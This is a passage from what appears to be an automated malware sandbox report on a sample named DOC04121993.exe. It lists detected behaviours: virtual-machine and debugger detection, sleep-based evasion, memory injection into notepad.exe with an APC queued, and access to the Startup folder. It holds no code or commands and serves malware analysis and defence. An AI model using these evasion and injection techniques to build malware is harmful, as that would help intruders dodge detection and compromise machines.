                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00436808
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00436808
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00436808
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00436808
                      Delayed program exit foundShow sources
                      Source: C:\Windows\SysWOW64\notepad.exeCode function: 1_2_00A305C0 Sleep,ExitProcess,
                      Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_003F05C0 Sleep,ExitProcess,
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                      Source: C:\Users\user\Desktop\DOC04121993.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00436808
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -119564s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -59594s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -59188s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -117376s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -117000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -58282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -115188s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -57406s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -57188s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -113000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -56282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -55688s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -82782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -55000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -54094s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -53000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -52782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -103376s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -103000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -75891s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -74250s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -73923s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -48188s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -48000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -47094s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -46500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -92000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -66750s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -43594s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -63750s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -63423s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -61782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -61500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -60141s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -78000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -58173s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -37688s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -36594s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -53250s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -35282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -51282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -51000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -33594s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -49641s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -32500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -32282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -48000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -47673s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -31188s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -30782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -45750s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -30094s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -42750s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -40032s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -39750s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -39423s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -36750s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -31500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -81423s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -53876s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -80391s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -80064s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -52094s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -51876s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -76782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -51000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -50094s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -49876s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -49000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -48594s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -47500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -47282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -46376s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -69282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -45500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -67923s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -67641s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -67314s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -66282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -66000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -43782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -64641s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -64314s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -42688s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -63000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -62673s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -62064s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -40688s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -60423s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -39594s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -39376s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -58782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -38500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -38282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -57141s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -56814s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -55782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -55500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -55173s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -54141s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -53814s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -53532s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -52500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -52173s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -51891s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -47250s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -59500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -58876s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -57782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -57376s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -56688s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -55782s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -55594s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -55376s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -54688s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -54500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -53188s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -52500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -52282s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -43376s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -39876s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -33688s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -33500s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -32876s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -32594s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -30876s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -30688s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 1064Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\DOC04121993.exe TID: 5696Thread sleep count: 79 > 30
                      Source: C:\Users\user\Desktop\DOC04121993.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DOC04121993.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DOC04121993.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00470848 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 00470863h
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00470848 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 00470863h
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00470848 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 00470863h
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00470848 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 00470863h
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00420920 GetSystemInfo,
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: wscript.exe, 00000004.00000002.221090997.0000024201259000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: DOC04121993.exe, 00000002.00000002.469094063.0000000005B60000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess queried: DebugFlags
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess queried: DebugFlags
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess queried: DebugFlags
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E33468 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_004696F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00446CD4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0046D412 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0046D4D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 7_2_0046D412 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 7_2_0046D4D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_004696F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_00468746 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0046BD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_00469BB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 7_2_0046BD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 7_2_004696F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 7_2_00469BB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory protected: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: A30000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: A40000 protect: page read and write
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 3F0000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory allocated: C:\Windows\SysWOW64\notepad.exe base: 600000 protect: page read and write
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeSection loaded: unknown target: C:\Users\user\Desktop\DOC04121993.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\DOC04121993.exeSection loaded: unknown target: C:\Users\user\Desktop\DOC04121993.exe protection: execute and read and write
                      Queues an APC in another process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeThread APC queued: target process: C:\Windows\SysWOW64\notepad.exe
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: A30000
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: A40000
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 3F0000
                      Source: C:\Users\user\Desktop\DOC04121993.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 600000
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: DOC04121993.exe, 00000002.00000002.464199660.0000000000E30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: DOC04121993.exe, 00000002.00000002.464199660.0000000000E30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: DOC04121993.exe, 00000002.00000002.464199660.0000000000E30000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: DOC04121993.exe, 00000002.00000002.464199660.0000000000E30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,GetACP,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,GetACP,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: GetLocaleInfoA,
